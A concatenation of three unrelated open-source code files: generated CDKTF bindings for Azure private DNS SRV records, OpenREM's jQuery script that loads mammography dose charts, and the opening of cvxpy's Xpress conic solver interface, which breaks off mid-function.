def target_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "targetInput"))
@builtins.property
@jsii.member(jsii_name="weightInput")
def weight_input(self) -> typing.Optional[jsii.Number]:
return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "weightInput"))
@builtins.property
@jsii.member(jsii_name="port")
def port(self) -> jsii.Number:
return typing.cast(jsii.Number, jsii.get(self, "port"))
@port.setter
def port(self, value: jsii.Number) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__615f905fa81317027630c677c04a430f49d3ccb884838091bba8eaa4a572f148)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "port", value)
@builtins.property
@jsii.member(jsii_name="priority")
def priority(self) -> jsii.Number:
return typing.cast(jsii.Number, jsii.get(self, "priority"))
@priority.setter
def priority(self, value: jsii.Number) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__b5333e5d37824dd83ad13f7fd27eb5dc6f4155b5d49deac80d1900771d8c1f29)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "priority", value)
@builtins.property
@jsii.member(jsii_name="target")
def target(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "target"))
@target.setter
def target(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__2cf9aff74f26ab9da9452f61165757960258f7f6f9b50cc2cdc11d1b1464f5cc)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "target", value)
@builtins.property
@jsii.member(jsii_name="weight")
def weight(self) -> jsii.Number:
return typing.cast(jsii.Number, jsii.get(self, "weight"))
@weight.setter
def weight(self, value: jsii.Number) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__6987e824530388baf3786bb836a1f20c8ab5055b1162b6f38ffb6804f8b38b14)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "weight", value)
@builtins.property
@jsii.member(jsii_name="internalValue")
def internal_value(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]]:
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]], jsii.get(self, "internalValue"))
@internal_value.setter
def internal_value(
self,
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]],
) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__7f38aabceaa05bbf1f35e5b33a0d1a91a5131239a3769073bb2707dee77fc380)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "internalValue", value)
@jsii.data_type(
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordTimeouts",
jsii_struct_bases=[],
name_mapping={
"create": "create",
"delete": "delete",
"read": "read",
"update": "update",
},
)
class PrivateDnsSrvRecordTimeouts:
def __init__(
self,
*,
create: typing.Optional[builtins.str] = None,
delete: typing.Optional[builtins.str] = None,
read: typing.Optional[builtins.str] = None,
update: typing.Optional[builtins.str] = None,
) -> None:
'''
:param create: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.
:param delete: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.
:param read: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.
:param update: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__87d040f7678d8ecf747002a99b4fc39453f52b07258d994977ec39ec8d74404a)
check_type(argname="argument create", value=create, expected_type=type_hints["create"])
check_type(argname="argument delete", value=delete, expected_type=type_hints["delete"])
check_type(argname="argument read", value=read, expected_type=type_hints["read"])
check_type(argname="argument update", value=update, expected_type=type_hints["update"])
self._values: typing.Dict[builtins.str, typing.Any] = {}
if create is not None:
self._values["create"] = create
if delete is not None:
self._values["delete"] = delete
if read is not None:
self._values["read"] = read
if update is not None:
self._values["update"] = update
@builtins.property
def create(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.'''
result = self._values.get("create")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def delete(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.'''
result = self._values.get("delete")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def read(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.'''
result = self._values.get("read")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def update(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.'''
result = self._values.get("update")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateDnsSrvRecordTimeouts(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class PrivateDnsSrvRecordTimeoutsOutputReference(
_cdktf_9a9027ec.ComplexObject,
metaclass=jsii.JSIIMeta,
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordTimeoutsOutputReference",
):
def __init__(
self,
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
) -> None:
'''
:param terraform_resource: The parent resource.
:param terraform_attribute: The attribute on the parent resource this class is referencing.
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__257b4267b536b6a5d1f74c438f324e6dbc44481b0e74180ddfd5c8320244dfa6)
check_type(argname="argument terraform_resource", value=terraform_resource, expected_type=type_hints["terraform_resource"])
check_type(argname="argument terraform_attribute", value=terraform_attribute, expected_type=type_hints["terraform_attribute"])
jsii.create(self.__class__, self, [terraform_resource, terraform_attribute])
@jsii.member(jsii_name="resetCreate")
def reset_create(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetCreate", []))
@jsii.member(jsii_name="resetDelete")
def reset_delete(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetDelete", []))
@jsii.member(jsii_name="resetRead")
def reset_read(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetRead", []))
@jsii.member(jsii_name="resetUpdate")
def reset_update(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetUpdate", []))
@builtins.property
@jsii.member(jsii_name="createInput")
def create_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "createInput"))
@builtins.property
@jsii.member(jsii_name="deleteInput")
def delete_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "deleteInput"))
@builtins.property
@jsii.member(jsii_name="readInput")
def read_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "readInput"))
@builtins.property
@jsii.member(jsii_name="updateInput")
def update_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "updateInput"))
@builtins.property
@jsii.member(jsii_name="create")
def create(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "create"))
@create.setter
def create(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__0ef4eceb0778e45fdae434eed891e21283bc1e8c46cd7930766ebfde9e572700)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "create", value)
@builtins.property
@jsii.member(jsii_name="delete")
def delete(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "delete"))
@delete.setter
def delete(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__ed8b59d5dbb9e882fe23132d2c7e972d43f5a359d4b8457dfa6c21e61d765789)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "delete", value)
@builtins.property
@jsii.member(jsii_name="read")
def read(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "read"))
@read.setter
def read(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__45bdfde5e460a19bec6ffff65f82981de5cda8db2d0eee3a6abd99cb38525a89)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "read", value)
@builtins.property
@jsii.member(jsii_name="update")
def update(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "update"))
@update.setter
def update(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__a646989dbb801f28a47229a84b85b1c968d6ce35aa04707f5663ce01f12fe4e6)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "update", value)
@builtins.property
@jsii.member(jsii_name="internalValue")
def internal_value(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]]:
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]], jsii.get(self, "internalValue"))
@internal_value.setter
def internal_value(
self,
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]],
) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__2141e235efa9d5afbbb2cffacb1f82d767f055d8247ae2c50059932b9acb4f3f)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "internalValue", value)
__all__ = [
"PrivateDnsSrvRecord",
"PrivateDnsSrvRecordConfig",
"PrivateDnsSrvRecordRecord",
"PrivateDnsSrvRecordRecordList",
"PrivateDnsSrvRecordRecordOutputReference",
"PrivateDnsSrvRecordTimeouts",
"PrivateDnsSrvRecordTimeoutsOutputReference",
]
publication.publish()
def _typecheckingstub__9fb1f1e98de1ef34a625d65c8f3eea9644cc513e083b9986d0a77faa13946b81(
scope: _constructs_77d1e7e8.Construct,
id_: builtins.str,
*,
name: builtins.str,
record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
resource_group_name: builtins.str,
ttl: jsii.Number,
zone_name: builtins.str,
id: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
timeouts: typing.Optional[typing.Union[PrivateDnsSrvRecordTimeouts, typing.Dict[builtins.str, typing.Any]]] = None,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__3446cdab40dde4b63f2981030819ea9139ec130a78d892342bc655a4b042f787(
value: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__28077eb04d7bb831db97de19877063bc0a999bf6b52e0aee568c8af46a5b07b0(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__89537ab7de0e19eeb9b414bb4e7d2653bf427cca6ba3a133ef9dae2b5c515f76(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__10431d6b61873cfd9f69121ea484514edfb955d74a54403fd37f6f9c04206925(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__09e59969cdfaeee04bee49b9bac92f2b9312bc265413607b8b3b422291b8bb96(
value: typing.Mapping[builtins.str, builtins.str],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__386b88e0b5003615ad7be07742b24369d9154bddd8cab1432bbf663646b16017(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__f1b8337fbac54d363e17fa332d7e7ce3d53c5de29bd61e998375788cff5645b0(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__37d28774e61198a32450196eeddf0acf6401d5b3aa85494d27b805561522c56c(
*,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
name: builtins.str,
record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union[PrivateDnsSrvRecordRecord, typing.Dict[builtins.str, typing.Any]]]],
resource_group_name: builtins.str,
ttl: jsii.Number,
zone_name: builtins.str,
id: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
timeouts: typing.Optional[typing.Union[PrivateDnsSrvRecordTimeouts, typing.Dict[builtins.str, typing.Any]]] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__4d8a667e77494c343d5678d6474f7bb0bd136821aed3ef4451ed78c87e84dcba(
*,
port: jsii.Number,
priority: jsii.Number,
target: builtins.str,
weight: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__e89f47f0bb2cbe75f9a6ed361f7566803e287b63bff302d8ef26eb743be5b2ba(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
wraps_set: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__c2f1f687800e6044c6e4b7ad1f9d433b238c8f2427f64fb30f2e58887a08cd17(
index: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__ffeae467d9ebabdbdc7aea6bc40010a0cffa849eabf29d495bf383aadd197a1f(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__912ffcbadc7002a828ee2f8238a844005fbec384d31975995d00725c1dc68e20(
value: _cdktf_9a9027ec.IInterpolatingParent,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__4e4247ceb672f8669f5ceedb986f44a697976b39c0bab53801f30a8f21e92324(
value: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__aea328d42c912241adc8e92da65030e2e45ba9281409430764d363df0eb8920c(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List[PrivateDnsSrvRecordRecord]]],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__eb01a9a53daa586676186a4d734bea38bd257ebaa81da1901024373e6b4c3200(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
complex_object_index: jsii.Number,
complex_object_is_from_set: builtins.bool,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__615f905fa81317027630c677c04a430f49d3ccb884838091bba8eaa4a572f148(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__b5333e5d37824dd83ad13f7fd27eb5dc6f4155b5d49deac80d1900771d8c1f29(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__2cf9aff74f26ab9da9452f61165757960258f7f6f9b50cc2cdc11d1b1464f5cc(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__6987e824530388baf3786bb836a1f20c8ab5055b1162b6f38ffb6804f8b38b14(
value: jsii.Number,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__7f38aabceaa05bbf1f35e5b33a0d1a91a5131239a3769073bb2707dee77fc380(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordRecord]],
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__87d040f7678d8ecf747002a99b4fc39453f52b07258d994977ec39ec8d74404a(
*,
create: typing.Optional[builtins.str] = None,
delete: typing.Optional[builtins.str] = None,
read: typing.Optional[builtins.str] = None,
update: typing.Optional[builtins.str] = None,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__257b4267b536b6a5d1f74c438f324e6dbc44481b0e74180ddfd5c8320244dfa6(
terraform_resource: _cdktf_9a9027ec.IInterpolatingParent,
terraform_attribute: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__0ef4eceb0778e45fdae434eed891e21283bc1e8c46cd7930766ebfde9e572700(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__ed8b59d5dbb9e882fe23132d2c7e972d43f5a359d4b8457dfa6c21e61d765789(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__45bdfde5e460a19bec6ffff65f82981de5cda8db2d0eee3a6abd99cb38525a89(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__a646989dbb801f28a47229a84b85b1c968d6ce35aa04707f5663ce01f12fe4e6(
value: builtins.str,
) -> None:
"""Type checking stubs"""
pass
def _typecheckingstub__2141e235efa9d5afbbb2cffacb1f82d767f055d8247ae2c50059932b9acb4f3f(
value: typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, PrivateDnsSrvRecordTimeouts]],
) -> None:
"""Type checking stubs"""
pass
|
PypiClean
|
/OpenREM-1.0.0b1.tar.gz/OpenREM-1.0.0b1/openrem/remapp/static/js/charts/mgChartAjax.js
|
// Code to update the page and chart data on initial page load.
$(document).ready(function() {
var requestData = arrayToURL(urlToArray(this.URL));
$(".ajax-progress").show();
$.ajax({
type: "GET",
url: Urls.mg_summary_chart_data(),
data: requestData,
dataType: "json",
success: function( json ) {
// Acquisition frequency chart data
if(typeof json.acquisitionFrequencyData !== "undefined") {
$("#acquisitionFrequencyChartDiv").html(json.acquisitionFrequencyData);
$("#acquisitionFrequencyChartParentDiv").append(json.acquisitionFrequencyDataCSV);
}
// AGD per acquisition chart data
if(typeof json.acquisitionMeanAGDData !== "undefined") {
$("#acquisitionMeanAGDChartDiv").html(json.acquisitionMeanAGDData);
$("#acquisitionMeanAGDChartParentDiv").append(json.acquisitionMeanAGDDataCSV);
}
if(typeof json.acquisitionMedianAGDData !== "undefined") {
$("#acquisitionMedianAGDChartDiv").html(json.acquisitionMedianAGDData);
$("#acquisitionMedianAGDChartParentDiv").append(json.acquisitionMedianAGDDataCSV);
}
if(typeof json.acquisitionBoxplotAGDData !=="undefined") {
$("#acquisitionBoxplotAGDChartDiv").html(json.acquisitionBoxplotAGDData);
}
if(typeof json.acquisitionHistogramAGDData !=="undefined") {
$("#acquisitionHistogramAGDChartDiv").html(json.acquisitionHistogramAGDData);
}
// AGD per acquisition grouped into compressed breast thickness bands
if(typeof json.meanAGDvsThickness !== "undefined") {
$("#acquisitionMeanAGDvsThickChartDiv").html(json.meanAGDvsThickness);
}
if(typeof json.medianAGDvsThickness !== "undefined") {
$("#acquisitionMedianAGDvsThickChartDiv").html(json.medianAGDvsThickness);
}
// Study workload chart data
if(typeof json.studyWorkloadData !== "undefined") {
$("#studyWorkloadChartDiv").html(json.studyWorkloadData);
}
// AGD vs compressed thickness scatter plot
if(typeof json.AGDvsThickness !== "undefined") {
$("#acquisitionScatterAGDvsThickChartDiv").html(json.AGDvsThickness);
}
// kVp vs compressed thickness scatter plot
if(typeof json.kVpvsThickness !== "undefined") {
$("#acquisitionScatterkVpvsThickChartDiv").html(json.kVpvsThickness);
}
// mAs vs compressed thickness scatter plot
if(typeof json.mAsvsThickness !== "undefined") {
$("#acquisitionScattermAsvsThickChartDiv").html(json.mAsvsThickness);
}
// AGD over time chart data
if(typeof json.acquisitionMeanAGDOverTime !== "undefined") {
$("#acquisitionMeanAGDOverTimeChartDiv").html(json.acquisitionMeanAGDOverTime);
}
if(typeof json.acquisitionMedianAGDOverTime !== "undefined") {
$("#acquisitionMedianAGDOverTimeChartDiv").html(json.acquisitionMedianAGDOverTime);
}
// Acquisition frequency chart data
if(typeof json.standardAcquisitionFrequencyData !== "undefined") {
$("#standardAcquisitionFrequencyChartDiv").html(json.standardAcquisitionFrequencyData);
$("#standardAcquisitionFrequencyChartParentDiv").append(json.standardAcquisitionFrequencyDataCSV);
}
// AGD per acquisition chart data
if(typeof json.standardAcquisitionMeanAGDData !== "undefined") {
$("#standardAcquisitionMeanAGDChartDiv").html(json.standardAcquisitionMeanAGDData);
$("#standardAcquisitionMeanAGDChartParentDiv").append(json.standardAcquisitionMeanAGDDataCSV);
}
if(typeof json.standardAcquisitionMedianAGDData !== "undefined") {
$("#standardAcquisitionMedianAGDChartDiv").html(json.standardAcquisitionMedianAGDData);
$("#standardAcquisitionMedianAGDChartParentDiv").append(json.standardAcquisitionMedianAGDDataCSV);
}
if(typeof json.standardAcquisitionBoxplotAGDData !=="undefined") {
$("#standardAcquisitionBoxplotAGDChartDiv").html(json.standardAcquisitionBoxplotAGDData);
}
if(typeof json.standardAcquisitionHistogramAGDData !=="undefined") {
$("#standardAcquisitionHistogramAGDChartDiv").html(json.standardAcquisitionHistogramAGDData);
}
// AGD per acquisition grouped into compressed breast thickness bands
if(typeof json.standardMeanAGDvsThickness !== "undefined") {
$("#standardAcquisitionMeanAGDvsThickChartDiv").html(json.standardMeanAGDvsThickness);
}
if(typeof json.standardMedianAGDvsThickness !== "undefined") {
$("#standardAcquisitionMedianAGDvsThickChartDiv").html(json.standardMedianAGDvsThickness);
}
// AGD vs compressed thickness scatter plot
if(typeof json.standardAGDvsThickness !== "undefined") {
$("#standardAcquisitionScatterAGDvsThickChartDiv").html(json.standardAGDvsThickness);
}
// kVp vs compressed thickness scatter plot
if(typeof json.standardkVpvsThickness !== "undefined") {
$("#standardAcquisitionScatterkVpvsThickChartDiv").html(json.standardkVpvsThickness);
}
// mAs vs compressed thickness scatter plot
if(typeof json.standardmAsvsThickness !== "undefined") {
$("#standardAcquisitionScattermAsvsThickChartDiv").html(json.standardmAsvsThickness);
}
// AGD over time chart data
if(typeof json.standardAcquisitionMeanAGDOverTime !== "undefined") {
$("#standardAcquisitionMeanAGDOverTimeChartDiv").html(json.standardAcquisitionMeanAGDOverTime);
}
if(typeof json.standardAcquisitionMedianAGDOverTime !== "undefined") {
$("#standardAcquisitionMedianAGDOverTimeChartDiv").html(json.standardAcquisitionMedianAGDOverTime);
}
// Standard study name workload chart data
if(typeof json.standardStudyWorkloadData !== "undefined") {
$("#standardStudyWorkloadChartDiv").html(json.standardStudyWorkloadData);
}
$(".ajax-progress").hide();
},
error: function( xhr, status, errorThrown ) {
$(".ajax-progress").hide();
$(".ajax-error").show();
console.log( "Error: " + errorThrown );
console.log( "Status: " + status );
console.dir( xhr );
}
});
return false;
});
|
PypiClean
|
/tyba_cvxpy-1.4.4-cp311-cp311-macosx_10_9_universal2.whl/cvxpy/reductions/solvers/conic_solvers/xpress_conif.py
|
import numpy as np
import cvxpy.settings as s
from cvxpy.constraints import SOC
from cvxpy.reductions.solution import Solution
from cvxpy.reductions.solvers import utilities
from cvxpy.reductions.solvers.conic_solvers.conic_solver import (
ConicSolver,
dims_to_solver_dict,
)
def makeMstart(A, n, ifCol: int = 1):
mstart = np.bincount(A.nonzero()[ifCol])
mstart = np.concatenate((np.array([0], dtype=np.int64),
mstart,
np.array([0] * (n - len(mstart)), dtype=np.int64)))
mstart = np.cumsum(mstart)
return mstart
class XPRESS(ConicSolver):
"""An interface for the Xpress solver.
"""
solvecount = 0
version = -1
# Solver capabilities.
MIP_CAPABLE = True
SUPPORTED_CONSTRAINTS = ConicSolver.SUPPORTED_CONSTRAINTS + [SOC]
MI_SUPPORTED_CONSTRAINTS = SUPPORTED_CONSTRAINTS
def __init__(self) -> None:
# Main member of this class: an Xpress problem. Marked with a
# trailing "_" to denote a member
self.prob_ = None
def name(self):
"""The name of the solver.
"""
return s.XPRESS
def import_solver(self) -> None:
"""Imports the solver.
"""
import xpress
self.version = xpress.getversion()
def accepts(self, problem) -> bool:
"""Can Xpress solve the problem?
"""
# TODO check if is matrix stuffed.
if not problem.objective.args[0].is_affine():
return False
for constr in problem.constraints:
if type(constr) not in self.SUPPORTED_CONSTRAINTS:
return False
for arg in constr.args:
if not arg.is_affine():
return False
return True
def apply(self, problem):
"""Returns a new problem and data for inverting the new solution.
Returns
-------
tuple
(dict of arguments needed for the solver, inverse data)
"""
"""Returns a new problem and data for inverting the new solution.
Returns
-------
tuple
(dict of arguments needed for the solver, inverse data)
"""
data, inv_data = super(XPRESS, self).apply(problem)
variables = problem.x
data[s.BOOL_IDX] = [int(t[0]) for t in variables.boolean_idx]
data[s.INT_IDX] = [int(t[0]) for t in variables.integer_idx]
inv_data['is_mip'] = data[s.BOOL_IDX] or data[s.INT_IDX]
return data, inv_data
def invert(self, solution, inverse_data):
"""Returns the solution to the original problem given the inverse_data.
"""
status = solution[s.STATUS]
primal_vars = None
dual_vars = None
if status in s.SOLUTION_PRESENT:
opt_val = solution['getObjVal'] + inverse_data[s.OFFSET]
primal_vars = {inverse_data[XPRESS.VAR_ID]: solution['primal']}
if not inverse_data['is_mip']:
eq_dual = utilities.get_dual_values(
solution['eq_dual'],
utilities.extract_dual_value,
inverse_data[XPRESS.EQ_CONSTR])
leq_dual = utilities.get_dual_values(
solution['ineq_dual'],
utilities.extract_dual_value,
inverse_data[XPRESS.NEQ_CONSTR])
eq_dual.update(leq_dual)
dual_vars = eq_dual
else:
if status == s.INFEASIBLE:
opt_val = np.inf
elif status == s.UNBOUNDED:
opt_val = -np.inf
else:
opt_val = None
other = {}
other[s.XPRESS_IIS] = solution[s.XPRESS_IIS]
other[s.XPRESS_TROW] = solution[s.XPRESS_TROW]
other[s.SOLVE_TIME] = solution[s.SOLVE_TIME]
return Solution(status, opt_val, primal_vars, dual_vars, other)
def solve_via_data(self, data, warm_start: bool, verbose: bool, solver_opts, solver_cache=None):
import xpress as xp
c = data[s.C] # objective coefficients
dims = dims_to_solver_dict(data[s.DIMS]) # contains number of columns, rows, etc.
nrowsEQ = dims[s.EQ_DIM]
nrowsLEQ = dims[s.LEQ_DIM]
nrows = nrowsEQ + nrowsLEQ
# linear constraints
b = data[s.B][:nrows] # right-hand side
A = data[s.A][:nrows] # coefficient matrix
# Problem
self.prob_ = xp.problem()
mstart = makeMstart(A, len(c), 1)
varGroups = {} # If origprob is passed, used to tie IIS to original constraints
transf2Orig = {} # Ties transformation constraints to originals via varGroups
nOrigVar = len(c)
# Uses flat naming. Warning: this mixes
# original with auxiliary variables.
varnames = ['x_{0:05d}'. format(i) for i in range(len(c))]
linRownames = ['lc_{0:05d}'.format(i) for i in range(len(b))]
if verbose:
self.prob_.controls.miplog = 2
self.prob_.controls.lplog = 1
self.prob_.controls.outputlog = 1
else:
self.prob_.controls.miplog = 0
self.prob_.controls.lplog = 0
self.prob_.controls.outputlog = 0
self.prob_.controls.xslp_log = -1
self.prob_.loadproblem(probname="CVX_xpress_conic",
# constraint types
qrtypes=['E'] * nrowsEQ + ['L'] * nrowsLEQ,
rhs=b, # rhs
range=None, # range
obj=c, # obj coeff
mstart=mstart, # mstart
mnel=None, # mnel (unused)
# linear coefficients
mrwind=A.indices[A.data != 0], # row indices
dmatval=A.data[A.data != 0], # coefficients
dlb=[-xp.infinity] * len(c), # lower bound
dub=[xp.infinity] * len(c), # upper bound
colnames=varnames, # column names
rownames=linRownames) # row names
# Set variable types for discrete variables
